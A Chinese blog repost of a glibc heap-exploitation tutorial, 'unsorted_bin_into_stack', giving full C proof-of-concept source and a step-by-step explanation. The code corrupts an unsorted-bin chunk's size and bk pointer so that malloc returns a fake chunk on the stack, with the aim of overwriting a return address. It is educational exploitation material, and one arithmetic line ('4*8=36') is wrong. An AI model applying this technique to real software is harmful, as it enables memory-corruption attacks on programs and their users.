其他分享
首页 > 其他分享> > 12.unsorted_bin_into_stack

12.unsorted_bin_into_stack

作者:互联网

源代码

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 #include <stdint.h>
 4 
 5 int main() {
 6   intptr_t stack_buffer[4] = {0};
 7 
 8   fprintf(stderr, "Allocating the victim chunk\n");
 9   intptr_t* victim = malloc(0x100);
10 
11   fprintf(stderr, "Allocating another chunk to avoid consolidating the top chunk with the small one during the free()\n");
12   intptr_t* p1 = malloc(0x100);
13 
14   fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
15   free(victim);
16 
17   fprintf(stderr, "Create a fake chunk on the stack");
18   fprintf(stderr, "Set size for next allocation and the bk pointer to any writable address");
19   stack_buffer[1] = 0x100 + 0x10;
20   stack_buffer[3] = (intptr_t)stack_buffer;
21 
22   //------------VULNERABILITY-----------
23   fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->size and victim->bk pointer\n");
24   fprintf(stderr, "Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem\n");
25   victim[-1] = 32;
26   victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stack
27   //------------------------------------
28 
29   fprintf(stderr, "Now next malloc will return the region of our fake chunk: %p\n", &stack_buffer[2]);
30   fprintf(stderr, "malloc(0x100): %p\n", malloc(0x100));
31 }

运行结果

先在栈上申请4*8=36=0x20字节的空间stack

然后申请两个100字节的堆victim,p1

p1是防止victim释放后和top chunk合并

释放victim,大于fastbin要求,所以进入unsort bin

 

接着将stack伪造成一个堆

将stack的size赋值为0x110

 bk指向任意可写地址,这里将其指向stack起始地址

然后将堆victim的size修改为32=0x20字节   (要满足(> 16 on x64) && < av->system_mem)的要求

将victim的bk修改为指向stack

此时victim还在unsort bin中

unsorted bin实际是 victim->stack->null

此时再申请一个0x100字节的堆

首先到unsorted bin中寻找

先找到victim 由于victim0>size被修改为了0x20,不满足大小要求,遍历victim->bk所指堆

于是找到stack ,大小满足,bk所指也为可写空间,满足条件,所以从链表中取出stack来分配

这就利用了unsorted bin的特性,使堆分配到了栈里

如果此时可以向堆里写入内容,即可覆盖栈中变量即返回地址

 

标签:bin,12,victim,chunk,into,fprintf,stderr,stack
来源: https://www.cnblogs.com/pfcode/p/10994337.html